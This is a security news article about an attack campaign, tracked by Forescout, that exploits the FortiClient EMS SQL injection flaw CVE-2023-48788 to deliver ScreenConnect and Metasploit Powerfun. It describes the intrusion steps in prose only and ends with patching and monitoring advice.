Cybersecurity researchers have discovered a new campaign that exploits a recently discovered security flaw in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads.
The activity involves exploitation of CVE-2023-48788 (CVSS score: 9.3), a critical SQL injection flaw that could allow an unauthenticated attacker to execute unauthorized code or commands via specially crafted requests.
Cybersecurity firm Forescout is tracking the campaign under the codename Connect: Fun thanks to the use of ScreenConnect and Powerfun for post-exploitation.
The intrusion targeted an anonymous media company that exposed its vulnerable FortiClient EMS device to the Internet shortly after the release of a proof-of-concept (PoC) exploit for the flaw on March 21, 2024.
In the following days, the unknown adversary was observed exploiting the flaw to unsuccessfully download ScreenConnect and then install remote desktop software using the msiexec utility.
However, on March 25, the PoC exploit was used to launch PowerShell code that downloaded Metasploit’s Powerfun script and initiated a reverse connection to another IP address.
SQL statements designed to download ScreenConnect from a remote domain (“ursketz[.]com”) using certutil, which was then installed via msiexec before establishing connections with a command and control (C2) server.
There is evidence to suggest that the threat actor behind it has been active since at least 2022, specifically targeting Fortinet equipment and using the Vietnamese and German languages in their infrastructure.
“The observed activity clearly has a manual component evidenced by all the failed attempts to download and install tools, as well as the relatively long time elapsed between each attempt,” said security researcher Sai Molige.
“This is evidence that this activity is part of a specific campaign, rather than an exploit included in cyber criminals’ automated botnets. From our observations, it appears that the actors behind this campaign are not carrying out mass scans but choosing target environments equipped with VPN devices.”
Forescout said the attack shares tactical and infrastructure overlaps with other incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 involving the abuse of CVE-2023-48788 to download ScreenConnect and Atera.
Organizations are advised to apply patches provided by Fortinet to address potential threats, monitor suspicious traffic, and use a web application firewall (WAF) to block potentially malicious requests.